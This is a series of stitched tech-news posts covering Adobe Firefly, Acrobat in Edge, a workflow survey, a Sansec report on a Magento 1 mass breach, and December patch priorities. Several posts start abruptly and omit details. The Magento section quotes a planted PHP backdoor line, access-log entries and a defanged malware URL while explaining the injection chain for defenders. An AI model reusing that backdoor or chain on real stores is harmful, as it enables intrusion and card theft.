The company says this beta release of Photoshop is its first Creative Cloud application to integrate Firefly with an exciting roadmap ahead that will transform workflows across Creative Cloud, Document Cloud, Experience Cloud and Adobe Express.

Adobe has a history of AI features, such as Neural Filters in Photoshop, Content Aware Fill in After Effects, Customer AI in Adobe Experience Platform and Liquid Mode in Acrobat — each empower Adobe customers to create, edit, measure, optimize and review billions of pieces of content.

Firefly was launched in April 2023 with an initial focus on the generation of images and text effects. The company notes it has quickly became one of the most successful beta launches in company’s history, with beta users generating over 100 million assets.

Since its launch, Adobe has been expanding Firefly to support vector recoloring and generative fill. According to Adobe, Firefly is the only AI service that generates commercially viable, professional quality content and is designed to be embedded directly into creators’ workflows.

The company notes Firefly’s first model is trained on Adobe Stock images, openly licensed content and other public domain content without copyright restrictions. Enterprises will be able to extend Firefly with their own creative collateral in order to generate content that includes the company’s images, vectors and brand language. The integration of Firefly across Adobe Experience Cloud applications will allow marketing organizations to use Firefly to accelerate their content supply chain production.

Supercharging Creativity and Design

The company says the integration of AI across Photoshop’s core tools enables new creative workflows that supercharge ideation with precise creative control.

Generative Fill automatically matches perspective, lighting and style of images. Users can generate digital content in seconds with the following AI features:

• Firefly: Firefly is designed to generate images that are safe for commercial use and is trained on Adobe Stock’s hundreds of millions of professional-grade, licensed, high-resolution images, helping ensure Firefly won’t generate content based on other peoples’ or brands’ intellectual property (IP).
• Magically leap from idea to image, with simple text prompts: Add, extend or remove content from images to achieve astounding results.
• Edit non-destructively: Create newly generated content in generative layers, enabling you to rapidly iterate through a myriad of creative possibilities and reverse the effects when you want, without impacting your original image.
• Create at a transformative rate: Experiment with off-the-wall ideas, ideate different concepts and produce boundless variations of high-quality content as fast as you can type.
• Available as a web tool: Generative Fill is also available as a new module in the Firefly beta for users interested in testing the new capabilities on the web.

Content Credentials

As a trusted partner to individuals and businesses of all sizes, Adobe says, it develops and deploys all AI capabilities with a customer-centric approach and according to its AI Ethics principles to ensure content and data transparency.

Generative Fill supports Content Credentials, serving an essential role in ensuring people know whether a piece of content was created by a human, AI-generated or AI-edited.

Content Credentials are like “nutrition labels” for digital content and remain associated with content wherever it is used, published or stored, enabling proper attribution and helping consumers make informed decisions about digital content.

The technology was developed by the Content Authenticity Initiative, which Adobe founded and recently surpassed 1,000 members.

When will Generative Fill be Availabile? 

Photoshop’s Generative Fill feature is available in the desktop beta app today and will be generally available in the second half of 2023. Generative Fill is also available as a module within the Firefly beta app.

The post Adobe Brings Firefly-Powered Generative AI into Design Workflows appeared first on My TechDecisions.

According to the companies, the deeper integration is designed to give users a unique PDF experience that includes higher fidelity for more accurate colors and graphics improved performance, enhanced security for PDF handling and better accessibility such as better text selection and read-aloud narration.

Essentially, the integration allows users to use Acrobat within the Microsoft Edge web browser without having to download or switch to a separate application.

Users who need more advanced digital document features such as editing text and images, converting PDFs to other formats and combining files will have to purchase an Acrobat subscription that enables access to those features anywhere, including directly inside Edge via a browser extension, the companies say.

Microsoft Edge users with existing Acrobat subscriptions can use the Acrobat extension in Edge at no extra cost, per the announcement.

Jared Spataro, Microsoft’s corporate vice president of modern work and business applications, says the enhanced integration will help improve productivity.

“Adobe’s PDF technology in Microsoft Edge means users will have fast and secure access to critical digital document capabilities,” Spataro says.

Meanwhile, Ashley Still, Adobe’s senior vice president and general manager says PDF is essential for modern businesses that rely on automation and collaboration.

“By bringing the global standard in PDF experience to Microsoft Edge and the billion-plus Windows users worldwide, Adobe and Microsoft are using our joint heritage and expertise in productivity to take an important step forward in making modern, secure, and connected work and life a reality,” Still says.

Read Next: Adobe, Microsoft Launch New Acrobat Integration in Teams

What IT needs to know about the Adobe Acrobat PDF, Microsoft Edge integration

According to Microsoft, the transition to the built-in Microsoft Edge PDF reader with the Adobe Acrobat PDF rendering engine will begin rolling out in March 2023, with an initial opt-in for managed devices via Intune policy. The Edge PDF solution in the legacy engine will be removed in March 2024, the company adds.

These Acrobat PDF capabilities will initially be available on Windows 10 and 11 only, and availability on macOS will be coming sometime in the future, according to Microsoft.

The built-in Microsoft Edge PDF solution with the Adobe Acrobat PDF engine will have “full feature parity” with the legacy Microsoft Edge PDF solution, Microsoft says in a Tech Community blog, and no functionality will be lost.

Users will only see an Adobe brand mark in the bottom corner of their PDF view, along with an option to try advanced features such as format converting, combining files and editing text and images.

Here is how the changes affect commercial and educational organizations, according to Microsoft’s FAQ:

How will this affect commercial organizations?

When rollout begins in March 2023, there will be no changes to managed Windows devices in organizations unless you choose to opt in. Users on unmanaged Windows devices will see an unobtrusive Adobe brand mark in the bottom corner of their PDF view. These users will also see an option to try the advanced features, such as converting PDFs, combining files, editing text and images. If an organization chooses to opt in, users on managed devices will see the same changes. The built-in Microsoft Edge PDF solution with the Adobe Acrobat PDF engine will have full feature parity with the legacy Microsoft Edge PDF solution. No functionality will be lost.

Users can sign in with their existing Adobe Acrobat subscription or can select the option to purchase an Adobe Acrobat subscription and download the Adobe Acrobat extension to use the advanced digital document features in Microsoft Edge.

How will this affect educational organizations?

EDU users on managed Windows devices will follow the same protocol as managed devices in commercial organizations. For EDU users that are not on a managed Windows device, they will automatically receive Adobe Acrobat PDF capabilities in Microsoft Edge starting in March 2023.

To opt into using Adobe Acrobat PDF capabilities in Microsoft Edge at launch, IT administrators in commercial organizations will need to enable the “NewPDFReaderOptInEnabled” policy in order to test the Adobe Acrobat PDF engine, Microsoft says.

For organizations that want to make a gradual change, they can opt-in beginning next month, and rollouts to managed devices will begin in September 2023–albeit with the ability to opt out. The opt-out policy will expire in March 2024, and the Microsoft Ege legacy PDF engine will be removed, per Microsoft’s FAQ.

The post Microsoft, Adobe Launch Acrobat Integration in Edge Browser appeared first on My TechDecisions.

The joint report from the tech companies, “Tapping Into Advanced Workflows to Grow and Energize Your Business,” sheds light on how digital leaders are digitizing workflows and making use of data analysis and insights to improve the business and reduce costs.

In partnership with Forbes Insights, the companies surveyed more than 600 senior digital and tech executives on their organizations’ digital workflows and found that 49% of CIOs say time and operational constraints are leading to incomplete or unsatisfactory digital workflow restructuring, and two-thirds plan to develop those processes further.

According to the survey, less than half of CIOs say their digital document processes are either advanced or leading, which the report defines as document digitation that is available to everyone and supported by artificial intelligence.

When those digital processes are lagging, efficiency and productivity suffer, according to the survey, as 51% say legacy workflows impede productivity in their organizations.

Conner Forest, a senior research analyst at 451 Research, says in the report that automation and AI will help free employees up to work more strategically and creatively in addition to keeping them more engaged.

“The more we invest in the tools and technologies we use to get our work done, the better engaged our employees are,” Forrest says.

Workflow digitization can also help improve the customer experience, says Andrew Wilson, Microsoft’s chief digital officer.

“If employees aren’t spending time scanning and uploading documents or chasing down contracts, they have time for higher-value work — and that work can often directly impact the customer,” Wilson says.

On the flipside, CIOs at organizations with fully digital workflows and processes cite more efficient employees (65%) and higher morale (63%) as the two most likely outcomes.

The report identifies better business outcomes as the most critical reason to invest in digital workflows, with nearly 40% saying they expect to better leverage data analytics and insights as a result, and 38% cite new business or revenue opportunities as a top benefit.

According to the report, a key aspect of improving organization-wide collaboration is removing data silos, but most CIOs say silos still exist.

While nearly 65% of CIOs say there has never been a greater need for cross-department collaboration, only 17% say they had a single source of truth where everyone in the organization could access the knowledge they created.

The post Digital Workflows are Lagging Behind Workplace Trends appeared first on My TechDecisions.

Although Adobe ended support for Magento 1 in June of 2020, many companies are still using it.

Attackers used a combination of SQL injection (SQLi) and PHP Object Injection (POI) to gain control of the Magento store.

According to Sansec, a leak in the Quickview plugin led attackers to run code directly on the server. Attackers abused the customer_eav_attribute

The added validation rule is a result of UNHEX:

This POI payload is used to trick the host application into crafting a malicious object. In this case Zend_Memory_Manager and Zend_CodeGenerator_Php_File are used to create a file called api_1.php with a simple backdoor eval($_POST[‘z’]).

Adding the malicious code to the database does not do anything, according to Sansec. However, the cleverness of the attack comes into fruition by using the validation rules for new customers, the attacker can trigger an unserialize by using the Magento sign up page, as illustrated by this request:

45.72.31.112    2022-01-28T15:12:02Z “GET /customer/account/create/ HTTP/1.1”

45.72.31.112    2022-01-28T15:12:08Z “GET /api_1.php HTTP/1.1”

Attackers can now run any PHP code via the API under score one period PHP backdoor.

Threat actors are capable of leaving at least 19 backdoors open on the system. IT admins should eliminate all the open back doors.

Leaving one open means the system will be hit again, warns Sansec.

In a series of Tweets, Sansec detailed how hundreds of stores were hit within a single day.

More than 350 ecommerce stores infected with malware in a single day.

Today our global crawler discovered 374 ecommerce stores infected with the same strain of malware. 370 of these stores load the malware via https://naturalfreshmall[.]com/image/pixel[.]js.

— Sansec (@sansecio) January 25, 2022

For more information on the attack, including indicators of compromise, read Sansec’s research. 

The post Sansec Finds Mass Breach Of Stores Running On Magento 1 E-Commerce Platform appeared first on My TechDecisions.

Microsoft and Adobe followed the typical patch Tuesday cycle, releasing a total of 78 patches across products from the two IT behemoths. However, Google and Apple also released significant security patches that IT admins should apply quickly.

For December, Microsoft issued patches for 67 vulnerabilities across a wide variety of products, including Windows, SP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.

According to Trend Micro’s Zero Day Initiative (ZDI) blog, that brings Microsoft’s total number of December patches to 83 after the company patched 16 CVEs in Microsoft Edge earlier this month.

Based on insight from the blog, here is a look at some of the Microsoft vulnerabilities that should be patched immediately.

CVE-2021-43890 – Windows AppX Installer Spoofing Vulnerability

According to ZDI, this vulnerability is in the AppX installer for Windows, and it is being used in malware in the Emotet/Trickbot/Bazaloader family. It is the only Microsoft vulnerability patched that is currently under active exploitation. In a successful exploit, an attacker crafts a malicious attachment to be used in phishing campaigns convinces the user to open it. Code execution occurs at the logged-on user level, so attackers would need to combine this with another bug to take control of a system.

“Emotet is like that holiday guest that just won’t take a hint and leave,” ZDI says in the blog. “This malware family has been going for some time now. It seems like it will be around for a bit longer.”

CVE-2021-43215 – iSNS Server Remote Code Execution Vulnerability

This vulnerability is in the Internet Storage Name Service (iSNS) sever that could allow remote code execution if an attacker sends a crafted request to an affected server. According to ZDI, iSNS is a protocol that enables automated discovery and management of iSCSI devices on a TCP/IP storage network. If you’re running a SAN in your IT environment, you either have an iSNS server or you configure each of the logical interfaces individually. This bug’s CVSS score is 9.8, so it is one to prioritize.

CVE-2021-43899 – Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability

This vulnerability in the company’s 4K Wireless Display Adapter patched in Microsoft’s Tuesday release could allow an unauthenticated attacker to execute code on an affected device. To successfully exploit this, an attacker needs to be on the same network as the 4K Display Adapter to send specially crafted packets to the affected device. According to ZDI, this will be a difficult patch because users need to install the Microsoft Wireless Display Adapter application from the company’s store onto a system connected to the adapter. Then, they can update via the “Update & Security” section of the app. This vulnerability’s CVSS score is also 9.8, so it’s another to prioritize if you use those adapters.

 CVE-2021-43907 – Visual Studio Code WSL Extension Remote Code Execution Vulnerability

This is another CVSS 9.8 flaw, a remote code execution vulnerability in the Visual Studio Code Windows Subsystem for Linux Extension. According to ZDI, the impacted product lets users use the Windows Subsystem for Linux (WSL) as a ful-time development environment from Visual Studio Code. This allows users to develop in a Linux-based environment, use Linux-specific toolchains and utilities, and run and debug Linux-based applications all from within Windows. The patch fixes a remote code execution flaw in the extension.

ZDI notes that Microsoft does not offer many details about how that code execution can occur, but it is listed as unauthenticated and requiring no user interaction, so admins should patch this quickly.

CVE-2021-42309 – Microsoft SharePoint Server Remote Code Execution Vulnerability

This vulnerability allows a user to elevate and execute code in the context of the service account, and attackers would need “Manage Lists” permissions on a SharePoint site, but by default, any authorized user can create their own new site with full permissions. The bug allows an attacker to bypass restrictions against running arbitrary server-side web controls.

Patch these Adobe, Google, Apple bugs, too

ZDI also noted that Adobe released 11 patches to fix 60 vulnerabilities in Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager, and Premiere Rush.

The most severe of these updates impacts Adobe Experience Manager, with the patch fixing eight different flaws, including one rated as CVSS 9.8 and several stored cross-site scripting (XSS) issues.

None of the Adobe bugs are listed as publicly known or under active exploitation.

The blog also noted several Google Chrome security fixes, including a suer-after-free bug in V8 that is listed as being exploited in the wild.

Meanwhile, Apple also released significant patches this week for iOS, iPadOS, macOS, Monterey, macOS Big Sur, tvOS and watchOS, ZDI notes.

The post Prioritize These December Microsoft Patches appeared first on My TechDecisions.